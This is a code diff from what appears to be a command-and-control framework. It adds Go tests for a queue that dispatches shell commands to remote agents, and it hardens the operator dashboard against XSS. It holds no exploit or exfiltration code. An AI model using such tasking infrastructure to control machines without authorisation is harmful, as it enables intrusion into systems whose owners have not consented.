+	if cancelled.Status != StatusCancelled || cancelled.CompletedAt == nil {
+		t.Fatalf("unexpected cancelled task: %#v", cancelled)
+	}
+	if _, err := store.Cancel("agent-one", task.ID); !errors.Is(err, ErrInvalidTransition) {
+		t.Fatalf("expected terminal transition rejection, got %v", err)
+	}
+}
+
+func TestCreateRejectsUnsupportedContractValues(t *testing.T) {
+	store := NewStore()
+	validExpiry := DefaultExpiresIn
+	zeroExpiry := 0
+	tooLongExpiry := MaxExpiresIn + 1
+	valid := CreateRequest{
+		SchemaVersion:    SchemaVersion,
+		Type:             TypeShell,
+		Arguments:        ShellArguments{Command: "whoami"},
+		TimeoutSeconds:   DefaultTimeoutSeconds,
+		ExpiresInSeconds: &validExpiry,
+	}
+	tests := []struct {
+		name    string
+		request CreateRequest
+	}{
+		{name: "missing schema version", request: func() CreateRequest {
+			request := valid
+			request.SchemaVersion = 0
+			return request
+		}()},
+		{name: "unsupported schema version", request: func() CreateRequest {
+			request := valid
+			request.SchemaVersion = SchemaVersion + 1
+			return request
+		}()},
+		{name: "unsupported type", request: func() CreateRequest {
+			request := valid
+			request.Type = "file"
+			return request
+		}()},
+		{name: "missing command", request: func() CreateRequest {
+			request := valid
+			request.Arguments.Command = ""
+			return request
+		}()},
+		{name: "timeout below minimum", request: func() CreateRequest {
+			request := valid
+			request.TimeoutSeconds = 0
+			return request
+		}()},
+		{name: "timeout above maximum", request: func() CreateRequest {
+			request := valid
+			request.TimeoutSeconds = MaxTimeoutSeconds + 1
+			return request
+		}()},
+		{name: "missing expiry", request: func() CreateRequest {
+			request := valid
+			request.ExpiresInSeconds = nil
+			return request
+		}()},
+		{name: "expiry below minimum", request: func() CreateRequest {
+			request := valid
+			request.ExpiresInSeconds = &zeroExpiry
+			return request
+		}()},
+		{name: "expiry above maximum", request: func() CreateRequest {
+			request := valid
+			request.ExpiresInSeconds = &tooLongExpiry
+			return request
+		}()},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			if _, err := store.Create("agent-one", tt.request); !IsValidationError(err) {
+				t.Fatalf("request %#v: expected validation error, got %v", tt.request, err)
+			}
+		})
+	}
+}
+
+func TestDispatchLeaseRedeliversSameTaskAndPrioritizesIt(t *testing.T) {
+	now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	store := newStoreWithOptions(func() time.Time { return now }, 10*time.Second, 10)
+
+	first, err := store.Create("agent-one", validCreateRequest("first", 300))
+	if err != nil {
+		t.Fatalf("create first task: %v", err)
+	}
+	dispatched, ok, err := store.DispatchNext("agent-one")
+	if err != nil || !ok {
+		t.Fatalf("dispatch first task: ok=%t err=%v", ok, err)
+	}
+	if dispatched.ID != first.ID || dispatched.DispatchedAt == nil {
+		t.Fatalf("unexpected first dispatch: %#v", dispatched)
+	}
+	originalDispatchedAt := *dispatched.DispatchedAt
+
+	now = now.Add(9 * time.Second)
+	if _, ok, err := store.DispatchNext("agent-one"); err != nil || ok {
+		t.Fatalf("task must not redeliver before lease: ok=%t err=%v", ok, err)
+	}
+	second, err := store.Create("agent-one", validCreateRequest("second", 300))
+	if err != nil {
+		t.Fatalf("create second task: %v", err)
+	}
+
+	now = now.Add(time.Second)
+	redelivered, ok, err := store.DispatchNext("agent-one")
+	if err != nil || !ok {
+		t.Fatalf("redeliver first task: ok=%t err=%v", ok, err)
+	}
+	if redelivered.ID != first.ID {
+		t.Fatalf("lease-expired task was not prioritized: got %s want %s", redelivered.ID, first.ID)
+	}
+	if redelivered.DispatchedAt == nil || !redelivered.DispatchedAt.Equal(originalDispatchedAt) {
+		t.Fatalf("redelivery changed original dispatched_at: %#v", redelivered.DispatchedAt)
+	}
+
+	runningUpdate := StatusUpdate{
+		SchemaVersion: SchemaVersion,
+		TaskID:        first.ID,
+		AgentID:       "agent-one",
+		Status:        StatusRunning,
+		Timestamp:     now.Add(-time.Hour),
+	}
+	if _, err := store.MarkRunning("agent-one", first.ID, runningUpdate); err != nil {
+		t.Fatalf("mark first task running: %v", err)
+	}
+	next, ok, err := store.DispatchNext("agent-one")
+	if err != nil || !ok || next.ID != second.ID {
+		t.Fatalf("dispatch queued second task: got=%#v ok=%t err=%v", next, ok, err)
+	}
+}
+
+func TestDispatchableTasksExpireAtBoundaryAcrossOperations(t *testing.T) {
+	t.Run("dispatch and list", func(t *testing.T) {
+		now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+		store := newStoreWithOptions(func() time.Time { return now }, time.Second, 10)
+		dispatchedTask, err := store.Create("agent-one", validCreateRequest("dispatched", 5))
+		if err != nil {
+			t.Fatalf("create dispatched task: %v", err)
+		}
+		queuedTask, err := store.Create("agent-one", validCreateRequest("queued", 5))
+		if err != nil {
+			t.Fatalf("create queued task: %v", err)
+		}
+		if _, ok, err := store.DispatchNext("agent-one"); err != nil || !ok {
+			t.Fatalf("dispatch task: ok=%t err=%v", ok, err)
+		}
+
+		now = now.Add(5 * time.Second)
+		if _, ok, err := store.DispatchNext("agent-one"); err != nil || ok {
+			t.Fatalf("expired tasks must not dispatch: ok=%t err=%v", ok, err)
+		}
+		history, err := store.List("agent-one")
+		if err != nil {
+			t.Fatalf("list expired tasks: %v", err)
+		}
+		if len(history) != 2 ||
+			history[0].ID != dispatchedTask.ID ||
+			history[1].ID != queuedTask.ID ||
+			history[0].Status != StatusExpired ||
+			history[1].Status != StatusExpired {
+			t.Fatalf("unexpected expired history: %#v", history)
+		}
+	})
+
+	t.Run("mark running", func(t *testing.T) {
+		now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+		store := newStoreWithOptions(func() time.Time { return now }, time.Second, 10)
+		task, err := store.Create("agent-one", validCreateRequest("expires", 1))
+		if err != nil {
+			t.Fatalf("create task: %v", err)
+		}
+		if _, ok, err := store.DispatchNext("agent-one"); err != nil || !ok {
+			t.Fatalf("dispatch task: ok=%t err=%v", ok, err)
+		}
+		now = now.Add(time.Second)
+		_, err = store.MarkRunning("agent-one", task.ID, StatusUpdate{
+			SchemaVersion: SchemaVersion,
+			TaskID:        task.ID,
+			AgentID:       "agent-one",
+			Status:        StatusRunning,
+			Timestamp:     now.Add(-time.Hour),
+		})
+		if !errors.Is(err, ErrInvalidTransition) {
+			t.Fatalf("expected expired transition conflict, got %v", err)
+		}
+		expired, err := store.Get("agent-one", task.ID)
+		if err != nil || expired.Status != StatusExpired {
+			t.Fatalf("task was not expired before running update: %#v err=%v", expired, err)
+		}
+	})
+}
+
+func TestRunningUpdateIsIdempotentAndUsesServerReceiptTime(t *testing.T) {
+	now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	store := newStoreWithOptions(func() time.Time { return now }, time.Second, 10)
+	task, err := store.Create("agent-one", validCreateRequest("whoami", 300))
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+	if _, ok, err := store.DispatchNext("agent-one"); err != nil || !ok {
+		t.Fatalf("dispatch task: ok=%t err=%v", ok, err)
+	}
+
+	now = now.Add(2 * time.Second)
+	agentTimestamp := now.Add(-time.Hour).In(time.FixedZone("agent", 3600))
+	update := StatusUpdate{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       "agent-one",
+		Status:        StatusRunning,
+		Timestamp:     agentTimestamp,
+	}
+	running, err := store.MarkRunning("agent-one", task.ID, update)
+	if err != nil {
+		t.Fatalf("clock-skewed running update: %v", err)
+	}
+	if running.StartedAt == nil || !running.StartedAt.Equal(now) {
+		t.Fatalf("task started_at must use server receipt time: got %v want %v", running.StartedAt, now)
+	}
+
+	sameInstant := update
+	sameInstant.Timestamp = update.Timestamp.UTC()
+	repeated, err := store.MarkRunning("agent-one", task.ID, sameInstant)
+	if err != nil || repeated.Status != StatusRunning {
+		t.Fatalf("idempotent running update failed: task=%#v err=%v", repeated, err)
+	}
+
+	conflict := update
+	conflict.Timestamp = conflict.Timestamp.Add(time.Second)
+	if _, err := store.MarkRunning("agent-one", task.ID, conflict); !errors.Is(err, ErrInvalidTransition) {
+		t.Fatalf("expected conflicting repeated update, got %v", err)
+	}
+}
+
+func TestCompletionIsIdempotentAndUsesServerReceiptTime(t *testing.T) {
+	now := time.Date(2026, 7, 23, 12, 0, 0, 0, time.UTC)
+	store := newStoreWithOptions(func() time.Time { return now }, time.Second, 10)
+	task, err := store.Create("agent-one", validCreateRequest("whoami", 300))
+	if err != nil {
+		t.Fatalf("create task: %v", err)
+	}
+	if _, ok, err := store.DispatchNext("agent-one"); err != nil || !ok {
+		t.Fatalf("dispatch task: ok=%t err=%v", ok, err)
+	}
+	agentStartedAt := now.Add(-time.Hour)
+	now = now.Add(time.Second)
+	runningUpdate := StatusUpdate{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       "agent-one",
+		Status:        StatusRunning,
+		Timestamp:     agentStartedAt,
+	}
+	if _, err := store.MarkRunning("agent-one", task.ID, runningUpdate); err != nil {
+		t.Fatalf("mark running: %v", err)
+	}
+	serverStartedAt := now
+
+	now = now.Add(2 * time.Second)
+	exitCode := 0
+	result := Result{
+		SchemaVersion: SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       "agent-one",
+		Outcome:       OutcomeCompleted,
+		StartedAt:     agentStartedAt,
+		CompletedAt:   agentStartedAt.Add(500 * time.Millisecond),
+		ExitCode:      &exitCode,
+		Output:        Output{Stdout: "ok\n", Stderr: ""},
+	}
+	completed, info, err := store.CompleteWithInfo("agent-one", result)
+	if err != nil || !info.Applied {
+		t.Fatalf("complete task: task=%#v info=%#v err=%v", completed, info, err)
+	}
+	if completed.StartedAt == nil || !completed.StartedAt.Equal(serverStartedAt) {
+		t.Fatalf("task started_at changed from server receipt time: %v", completed.StartedAt)
+	}
+	if completed.CompletedAt == nil || !completed.CompletedAt.Equal(now) {
+		t.Fatalf("task completed_at must use server receipt time: got %v want %v", completed.CompletedAt, now)
+	}
+	if completed.Result == nil ||
+		!completed.Result.StartedAt.Equal(agentStartedAt) ||
+		!completed.Result.CompletedAt.Equal(result.CompletedAt) {
+		t.Fatalf("agent result timestamps were not preserved: %#v", completed.Result)
+	}
+
+	repeatedResult := result
+	repeatedResult.StartedAt = result.StartedAt.In(time.FixedZone("repeat", -5*3600))
+	repeatedResult.CompletedAt = result.CompletedAt.In(time.FixedZone("repeat", -5*3600))
+	repeated, repeatInfo, err := store.CompleteWithInfo("agent-one", repeatedResult)
+	if err != nil || repeatInfo.Applied || repeated.Status != StatusCompleted {
+		t.Fatalf("idempotent result failed: task=%#v info=%#v err=%v", repeated, repeatInfo, err)
+	}
+	replayedRunning, err := store.MarkRunning("agent-one", task.ID, runningUpdate)
+	if err != nil || replayedRunning.Status != StatusCompleted {
+		t.Fatalf("accepted running update did not remain idempotent after completion: task=%#v err=%v", replayedRunning, err)
+	}
+
+	conflict := result
+	conflict.Output.Stdout = "different"
+	if _, _, err := store.CompleteWithInfo("agent-one", conflict); !errors.Is(err, ErrInvalidTransition) {
+		t.Fatalf("expected conflicting terminal result, got %v", err)
+	}
+}
+
+func TestTaskHistoryCapacityPrunesOnlyTerminalTasks(t *testing.T) {
+	store := newStoreWithOptions(time.Now, time.Second, 2)
+	first, err := store.Create("agent-one", validCreateRequest("first", 300))
+	if err != nil {
+		t.Fatalf("create first: %v", err)
+	}
+	second, err := store.Create("agent-one", validCreateRequest("second", 300))
+	if err != nil {
+		t.Fatalf("create second: %v", err)
+	}
+	if _, err := store.Create("agent-one", validCreateRequest("blocked", 300)); !errors.Is(err, ErrCapacity) {
+		t.Fatalf("expected capacity error with only active tasks, got %v", err)
+	}
+	if _, err := store.Cancel("agent-one", first.ID); err != nil {
+		t.Fatalf("cancel first: %v", err)
+	}
+	third, err := store.Create("agent-one", validCreateRequest("third", 300))
+	if err != nil {
+		t.Fatalf("create after terminal prune: %v", err)
+	}
+	history, err := store.List("agent-one")
+	if err != nil {
+		t.Fatalf("list history: %v", err)
+	}
+	if len(history) != 2 || history[0].ID != second.ID || history[1].ID != third.ID {
+		t.Fatalf("terminal pruning retained wrong tasks: %#v", history)
+	}
+	if _, err := store.Get("agent-one", first.ID); !errors.Is(err, ErrNotFound) {
+		t.Fatalf("pruned task should be removed by id, got %v", err)
+	}
+}
+
+func TestLegacyDispatchSkipsTypedTasksAndRecordsErrorsHonestly(t *testing.T) {
+	store := newStoreWithOptions(time.Now, time.Second, 10)
+	typed, err := store.Create("agent-one", validCreateRequest("typed", 300))
+	if err != nil {
+		t.Fatalf("create typed task: %v", err)
+	}
+	legacy, err := store.CreateLegacyShell("agent-one", "legacy")
+	if err != nil {
+		t.Fatalf("create legacy task: %v", err)
+	}
+	got, ok, err := store.DispatchNextLegacy("agent-one")
+	if err != nil || !ok || got.ID != legacy.ID {
+		t.Fatalf("legacy poll consumed wrong task: got=%#v ok=%t err=%v", got, ok, err)
+	}
+	if typedState, err := store.Get("agent-one", typed.ID); err != nil || typedState.Status != StatusQueued {
+		t.Fatalf("typed-origin task was consumed by legacy poll: %#v err=%v", typedState, err)
+	}
+	failed, matched, err := store.CompleteLegacy("agent-one", "legacy", "Error: timed out")
+	if err != nil || !matched {
+		t.Fatalf("complete legacy failure: matched=%t err=%v", matched, err)
+	}
+	if failed.Status != StatusFailed ||
+		failed.Result == nil ||
+		failed.Result.Outcome != OutcomeFailed ||
+		failed.Result.ExitCode != nil ||
+		failed.Result.Error != "Error: timed out" {
+		t.Fatalf("legacy failure was recorded dishonestly: %#v", failed)
+	}
+}
+
+func TestContractCharacterLimits(t *testing.T) {
+	store := newStoreWithOptions(time.Now, time.Second, 10)
+	if _, err := store.Create(
+		"agent-one",
+		validCreateRequest(strings.Repeat("界", MaxCommandCharacters), 300),
+	); err != nil {
+		t.Fatalf("maximum Unicode command should be accepted: %v", err)
+	}
+	if _, err := store.Create(
+		"agent-two",
+		validCreateRequest(strings.Repeat("界", MaxCommandCharacters+1), 300),
+	); !IsValidationError(err) {
+		t.Fatalf("oversized Unicode command should be rejected, got %v", err)
+	}
+}
+
+func validCreateRequest(command string, expiresIn int) CreateRequest {
+	return CreateRequest{
+		SchemaVersion:    SchemaVersion,
+		Type:             TypeShell,
+		Arguments:        ShellArguments{Command: command},
+		TimeoutSeconds:   DefaultTimeoutSeconds,
+		ExpiresInSeconds: &expiresIn,
+	}
+}

--- a/server/web/js/index.js
+++ b/server/web/js/index.js
@@ -12,8 +12,22 @@ class DashboardManager {
         this.initializeWebSocket();
         this.setupEventListeners();
 
-        this.selectedAgentId = null;
+        this.selectedAgentID = null;
         this.resultsPollingInterval = null;
+        this.taskStates = new Map();
+        this.taskRequestSequence = 0;
+        this.taskRequestController = null;
+        this.taskRequestAgentID = null;
+        this.taskRequestOffset = null;
+        this.taskRequestPromise = null;
+        this.taskPageAgentID = null;
+        this.taskPageOffset = 0;
+        this.taskDetailCache = new Map();
+        this.taskDetailRequests = new Map();
+        this.taskElements = new Map();
+        this.TASK_PAGE_LIMIT = 50;
+        this.MAX_TASK_DETAIL_CACHE = 20;
+        this.agentInteractionSequence = 0;
 
         // Periodically refresh active components
         this.loadActiveListeners();
@@ -153,11 +167,12 @@ class DashboardManager {
         const eventLog = document.getElementById('event-log');
         const logEntry = document.createElement('div');
         logEntry.className = 'log-entry';
-        
-        logEntry.innerHTML = `
-            <span class="message">${entry.message}</span>
-        `;
-        
+
+        const message = document.createElement('span');
+        message.className = 'message';
+        message.textContent = entry.message;
+        logEntry.appendChild(message);
+
         eventLog.appendChild(logEntry);
         
         if (this.autoScroll) {
@@ -166,7 +181,7 @@ class DashboardManager {
     }
 
     clearEventLog() {
-        document.getElementById('event-log').innerHTML = '';
+        document.getElementById('event-log').replaceChildren();
     }
 
     toggleAutoScroll() {
@@ -195,30 +210,47 @@ class DashboardManager {
         }
 
         if (command) {
+            const agentID = this.selectedAgentID;
             try {
-                const response = await fetch('/api/agents/command', {
+                const response = await fetch(`/api/agents/${encodeURIComponent(agentID)}/tasks`, {
                     method: 'POST',
                     headers: {
                         'Content-Type': 'application/json'
                     },
                     body: JSON.stringify({
-                        agent_id: this.selectedAgentID,
-                        command
+                        schema_version: 1,
+                        type: 'shell',
+                        arguments: {
+                            command
+                        },
+                        timeout_seconds: 30,
+                        expires_in_seconds: 300
                     })
                 });
 
-                if (!response.ok) {
-                    throw new Error(`Server returned ${response.status}`);
+                if (response.status !== 202) {
+                    throw new Error(`Server returned ${response.status}; expected 202 Accepted`);
                 }
+
+                const acceptedTask = await response.json();
+                const taskID = acceptedTask.id || acceptedTask.task_id;
+                const taskStatus = acceptedTask.status || 'queued';
+                if (!taskID) {
+                    throw new Error('Server accepted the task without returning a task ID');
+                }
+                this.taskStates.set(taskID, taskStatus);
 
                 this.appendLogEntry({
                     timestamp: new Date().toISOString(),
                     severity: 'INFO',
-                    message: `Command sent to agent ${this.selectedAgentID}: ${command}`,
+                    message: `Task ${taskID} accepted for agent ${agentID} (${taskStatus})`,
                     source: 'user'
                 });
 
                 commandInput.value = '';
+                if (this.selectedAgentID === agentID) {
+                    await this.loadAgentResults(agentID, 0);
+                }
             } catch (error) {
                 console.error('Error sending command:', error);
                 this.appendLogEntry({
@@ -243,21 +275,20 @@ class DashboardManager {
             const listenersContainer = document.getElementById('active-listeners');
             
             if (!Array.isArray(listeners) || listeners.length === 0) {
-                listenersContainer.innerHTML = `
-                    <div class="empty-state">
-                        <p>No active listeners</p>
-                        <p>Go to the Listeners page to create one</p>
-                    </div>
-                `;
+                this.replaceWithEmptyState(listenersContainer, [
+                    'No active listeners',
+                    'Go to the Listeners page to create one'
+                ]);
                 return;
             }
             
-            let html = '';
+            const listenerCards = [];
             listeners.forEach(listener => {
                 const config = listener.config || {};
                 const listenerId = config.id || listener.id;
                 const listenerName = config.name || listener.name || 'Unnamed';
-                const listenerProtocol = config.protocol || listener.Protocol || listener.type || 'Unknown';
+                const listenerProtocol = config.protocol || listener.protocol ||
+                    listener.Protocol || listener.type || 'Unknown';
                 const listenerHost = config.host || listener.host || 'Unknown';
                 const listenerPort = config.port || listener.port || 'Unknown';
                 const listenerStatus = listener.status || 'Unknown';
@@ -268,26 +299,15 @@ class DashboardManager {
                     return;
                 }
 
-                html += `
-                    <div class="listener-card" data-id="${listenerId}" data-host="${listenerHost}" data-port="${listenerPort}">
-                        <div class="listener-header">
-                            <span class="listener-name">${listenerName}</span>
-                            <span class="listener-type">${listenerProtocol}</span>
-                        </div>
-                        <div class="listener-details">
-                            <div class="listener-id">ID: ${listenerId}</div>
-                            <div>Host: ${listenerHost}:${listenerPort}</div>
-                            <div>Status: <span class="status-${listenerStatus.toLowerCase()}">${listenerStatus}</span></div>
-                            ${listenerError ? `<div class="error-message">Error: ${listenerError}</div>` : ''}
-                        </div>
-                        <div class="listener-actions">
-                            ${listenerStatus.toLowerCase() === 'stopped' ? 
-                              `<button class="action-button success" onclick="dashboardManager.startListener('${listenerId}')">Start</button>` : 
-                              `<button class="action-button" onclick="dashboardManager.stopListener('${listenerId}')">Stop</button>`}
-                            <button class="action-button delete" onclick="dashboardManager.deleteListener('${listenerId}', '${listenerName}')">Delete</button>
-                        </div>
-                    </div>
-                `;
+                listenerCards.push(this.createListenerCard({
+                    id: listenerId,
+                    name: listenerName,
+                    protocol: listenerProtocol,
+                    host: listenerHost,
+                    port: listenerPort,
+                    status: listenerStatus,
+                    error: listenerError
+                }));
                 
                 // Track listener state changes for notifications
                 if (listenerId && listenerName) {
@@ -307,22 +327,89 @@ class DashboardManager {
                 }
             });
             
-            listenersContainer.innerHTML = html;
+            listenersContainer.replaceChildren(...listenerCards);
             
         } catch (error) {
             console.error('Error loading listeners:', error);
-            document.getElementById('active-listeners').innerHTML = `
-                <div class="empty-state">
-                    <p>Error loading listeners</p>
-                    <p>${error.message}</p>
-                </div>
-            `;
+            this.replaceWithEmptyState(
+                document.getElementById('active-listeners'),
+                ['Error loading listeners', error.message]
+            );
         }
+    }
+
+    createListenerCard(listener) {
+        const card = document.createElement('div');
+        card.className = 'listener-card';
+        card.dataset.id = String(listener.id);
+        card.dataset.host = String(listener.host);
+        card.dataset.port = String(listener.port);
+
+        const header = document.createElement('div');
+        header.className = 'listener-header';
+        this.appendTextElement(header, 'span', 'listener-name', listener.name);
+        this.appendTextElement(header, 'span', 'listener-type', listener.protocol);
+        card.appendChild(header);
+
+        const details = document.createElement('div');
+        details.className = 'listener-details';
+        this.appendTextElement(details, 'div', 'listener-id', `ID: ${listener.id}`);
+        this.appendTextElement(details, 'div', '', `Host: ${listener.host}:${listener.port}`);
+
+        const statusLine = document.createElement('div');
+        statusLine.appendChild(document.createTextNode('Status: '));
+        this.appendTextElement(
+            statusLine,
+            'span',
+            this.listenerStatusClass(listener.status),
+            listener.status
+        );
+        details.appendChild(statusLine);
+
+        if (listener.error) {
+            this.appendTextElement(
+                details,
+                'div',
+                'error-message',
+                `Error: ${listener.error}`
+            );
+        }
+        card.appendChild(details);
+
+        const actions = document.createElement('div');
+        actions.className = 'listener-actions';
+        const stopped = String(listener.status).toLowerCase() === 'stopped';
+        const stateButton = this.createActionButton(
+            stopped ? 'action-button success' : 'action-button',
+            stopped ? 'Start' : 'Stop',
+            () => {
+                if (stopped) {
+                    void this.startListener(listener.id);
+                } else {
+                    void this.stopListener(listener.id);
+                }
+            }
+        );
+        actions.appendChild(stateButton);
+        actions.appendChild(this.createActionButton(
+            'action-button delete',
+            'Delete',
+            () => void this.deleteListener(listener.id, listener.name)
+        ));
+        card.appendChild(actions);
+
+        return card;
+    }
+
+    listenerStatusClass(status) {
+        const token = String(status).toLowerCase();
+        const allowedTokens = new Set(['active', 'inactive', 'stopped', 'pending']);
+        return `status-${allowedTokens.has(token) ? token : 'unknown'}`;
     }
 
     async startListener(id) {
         try {
-            const response = await fetch(`/api/listeners/${id}/start`, { 
+            const response = await fetch(`/api/listeners/${encodeURIComponent(id)}/start`, {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json'
@@ -358,7 +445,7 @@ class DashboardManager {
 
     async stopListener(id) {
         try {
-            const response = await fetch(`/api/listeners/${id}/stop`, { 
+            const response = await fetch(`/api/listeners/${encodeURIComponent(id)}/stop`, {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json'
@@ -393,7 +480,7 @@ class DashboardManager {
         if (!confirm(`Are you sure you want to delete ${name}?`)) return;
         
         try {
-            const response = await fetch(`/api/listeners/${id}`, { 
+            const response = await fetch(`/api/listeners/${encodeURIComponent(id)}`, {
                 method: 'DELETE',
                 headers: {
                     'Content-Type': 'application/json'
@@ -426,7 +513,7 @@ class DashboardManager {
 
     async handleStartListenerFallback(id) {
         try {
-            const response = await fetch(`/api/listeners/${id}`);
+            const response = await fetch(`/api/listeners/${encodeURIComponent(id)}`);
             if (!response.ok) {
                 throw new Error(`Failed to get listener details (${response.status})`);
             }
@@ -437,7 +524,7 @@ class DashboardManager {
             delete newConfig.id;
             
             // Delete the old listener
-            const deleteResponse = await fetch(`/api/listeners/${id}`, {
+            const deleteResponse = await fetch(`/api/listeners/${encodeURIComponent(id)}`, {
                 method: 'DELETE'
             });
             
@@ -483,16 +570,14 @@ class DashboardManager {
             const agentsContainer = document.getElementById('agent-list');
 
             if (!Array.isArray(agents) || agents.length === 0) {
-                agentsContainer.innerHTML = `
-                    <div class="empty-state">
-                        <p>No active agents</p>
-                        <p>Generate a payload to get started</p>
-                    </div>
-                `;
+                this.replaceWithEmptyState(agentsContainer, [
+                    'No active agents',
+                    'Generate a payload to get started'
+                ]);
                 return;
             }
 
-            let html = '';
+            const agentCards = [];
             agents.forEach(agent => {
                 const lastSeen = new Date(agent.last_seen || Date.now()).toLocaleString();
                 const agentStatus = agent.connected ? 'active' : 'disconnected';
@@ -509,45 +594,102 @@ class DashboardManager {
                 }
                 this.previousAgentStates.set(agent.id, agentStatus);
 
-                html += `
-                    <div class="agent-card" data-id="${agent.id}">
-                        <div class="agent-header">
-                            <div class="agent-title">
-                                <div class="agent-status ${agentStatus}"></div>
-                                <span class="agent-name">${agent.id}</span>
-                            </div>
-                            <span class="agent-type">${agent.type || 'Standard'}</span>
-                        </div>
-                        <div class="agent-details">
-                            <div>Last Seen: ${lastSeen}</div>
-                            <div>IP: ${agent.ip || 'Unknown'}</div>
-                            <div>Hostname: ${agent.hostname || 'Unknown'}</div>
-                            <div>OS: ${agent.os || 'Unknown'}</div>
-                        </div>
-                        <div class="agent-actions">
-                            <button class="action-button" onclick="dashboardManager.interactWithAgent('${agent.id}')">Interact</button>
-                            <button class="action-button delete" onclick="dashboardManager.removeAgent('${agent.id}')">Remove</button>
-                        </div>
-                    </div>
-                `;
+                agentCards.push(this.createAgentCard(agent, lastSeen, agentStatus));
             });
 
-            agentsContainer.innerHTML = html;
+            agentsContainer.replaceChildren(...agentCards);
         } catch (error) {
             console.error('Error loading agents:', error);
-            document.getElementById('agent-list').innerHTML = `
-                <div class="empty-state">
-                    <p>Error loading agents</p>
-                    <p>${error.message}</p>
-                </div>
-            `;
+            this.replaceWithEmptyState(
+                document.getElementById('agent-list'),
+                ['Error loading agents', error.message]
+            );
         }
     }
 
+    createAgentCard(agent, lastSeen, agentStatus) {
+        const card = document.createElement('div');
+        card.className = 'agent-card';
+        card.dataset.id = String(agent.id);
+
+        const header = document.createElement('div');
+        header.className = 'agent-header';
+        const title = document.createElement('div');
+        title.className = 'agent-title';
+        const statusIndicator = document.createElement('div');
+        statusIndicator.className = agentStatus === 'active'
+            ? 'agent-status active'
+            : 'agent-status disconnected';
+        title.appendChild(statusIndicator);
+        this.appendTextElement(title, 'span', 'agent-name', agent.id);
+        header.appendChild(title);
+        this.appendTextElement(header, 'span', 'agent-type', agent.type || 'Standard');
+        card.appendChild(header);
+
+        const details = document.createElement('div');
+        details.className = 'agent-details';
+        this.appendTextElement(details, 'div', '', `Last Seen: ${lastSeen}`);
+        this.appendTextElement(details, 'div', '', `IP: ${agent.ip || 'Unknown'}`);
+        this.appendTextElement(details, 'div', '', `Hostname: ${agent.hostname || 'Unknown'}`);
+        this.appendTextElement(details, 'div', '', `OS: ${agent.os || 'Unknown'}`);
+        card.appendChild(details);
+
+        const actions = document.createElement('div');
+        actions.className = 'agent-actions';
+        actions.appendChild(this.createActionButton(
+            'action-button',
+            'Interact',
+            () => void this.interactWithAgent(agent.id)
+        ));
+        actions.appendChild(this.createActionButton(
+            'action-button delete',
+            'Remove',
+            () => void this.removeAgent(agent.id)
+        ));
+        card.appendChild(actions);
+
+        return card;
+    }
+
+    appendTextElement(parent, tag, className, value) {
+        const element = document.createElement(tag);
+        if (className) {
+            element.className = className;
+        }
+        element.textContent = String(value);
+        parent.appendChild(element);
+        return element;
+    }
+
+    createActionButton(className, label, action) {
+        const button = document.createElement('button');
+        button.className = className;
+        button.textContent = label;
+        button.addEventListener('click', action);
+        return button;
+    }
+
+    replaceWithEmptyState(container, messages) {
+        const emptyState = document.createElement('div');
+        emptyState.className = 'empty-state';
+        messages.forEach(message => {
+            this.appendTextElement(emptyState, 'p', '', message);
+        });
+        container.replaceChildren(emptyState);
+    }
+
     async interactWithAgent(AgentID) {
+        const interactionSequence = ++this.agentInteractionSequence;
+        const previousAgentID = this.selectedAgentID;
+
         // Select the agent for interaction
         // This will be used by the command shell
         this.selectedAgentID = AgentID;
+        if (previousAgentID !== AgentID) {
+            this.abortTaskDetailRequests();
+            this.taskPageAgentID = AgentID;
+            this.taskPageOffset = 0;
+        }
         
         this.appendLogEntry({
             timestamp: new Date().toISOString(),
@@ -560,14 +702,29 @@ class DashboardManager {
         const input = document.getElementById('command-input');
         input.placeholder = `Enter command for agent ${AgentID}...`;
 
-        this.loadAgentResults(AgentID);
+        if (this.resultsPollingInterval) {
+            clearInterval(this.resultsPollingInterval);
+            this.resultsPollingInterval = null;
+        }
+        await this.loadAgentResults(AgentID);
+        if (
+            this.selectedAgentID !== AgentID ||
+            this.agentInteractionSequence !== interactionSequence
+        ) {
+            return;
+        }
+        this.resultsPollingInterval = setInterval(() => {
+            if (document.visibilityState === 'visible' && this.selectedAgentID === AgentID) {
+                void this.loadAgentResults(AgentID);
+            }
+        }, 2000);
     }
 
     async removeAgent(AgentID) {
         if (!confirm(`Are you sure you want to remove agent ${AgentID}?`)) return;
 
         try {
-            const response = await fetch(`/api/agents/${AgentID}`, {
+            const response = await fetch(`/api/agents/${encodeURIComponent(AgentID)}`, {
                 method: 'DELETE'
             });
 
@@ -593,36 +750,447 @@ class DashboardManager {
         }
     }
 
-    async loadAgentResults(AgentID) {
+    loadAgentResults(AgentID, requestedOffset = this.taskPageOffsetFor(AgentID)) {
         const outputDiv = document.getElementById('command-output');
-        outputDiv.innerHTML = '<div>Loading results...</div>';
-        try {
-            const response = await fetch(`/api/agents/${AgentID}/results`);
-            if (!response.ok) {
-                outputDiv.innerHTML = '<div>No results found.</div>';
-                return;
-            }
-            const results = await response.json();
-            console.log('Results from backend:', results);
-            if (!Array.isArray(results) || results.length === 0) {
-                outputDiv.innerHTML = '<div>No results found.</div>';
-                return;
-            }
-            outputDiv.innerHTML = results.map(res => `
-                <div class="command-result">
-                    <span class="timestamp">${res.timestamp || ''}</span>
-                    <span class="command">${res.command || ''}</span>
-                    <pre class="output">${res.output || ''}</pre>
-                </div>
-            `).join('');
-        } catch (e) {
-            outputDiv.innerHTML = `<div>Error loading results: ${e.message}</div>`;
+        if (!Number.isInteger(requestedOffset) || requestedOffset < 0) {
+            throw new Error('Task page offset must be a nonnegative integer');
         }
+        if (this.taskRequestController) {
+            if (
+                this.taskRequestAgentID === AgentID &&
+                this.taskRequestOffset === requestedOffset &&
+                this.taskRequestPromise
+            ) {
+                return this.taskRequestPromise;
+            }
+            this.taskRequestController.abort();
+        }
+
+        const requestSequence = ++this.taskRequestSequence;
+        const requestController = new AbortController();
+        this.taskRequestController = requestController;
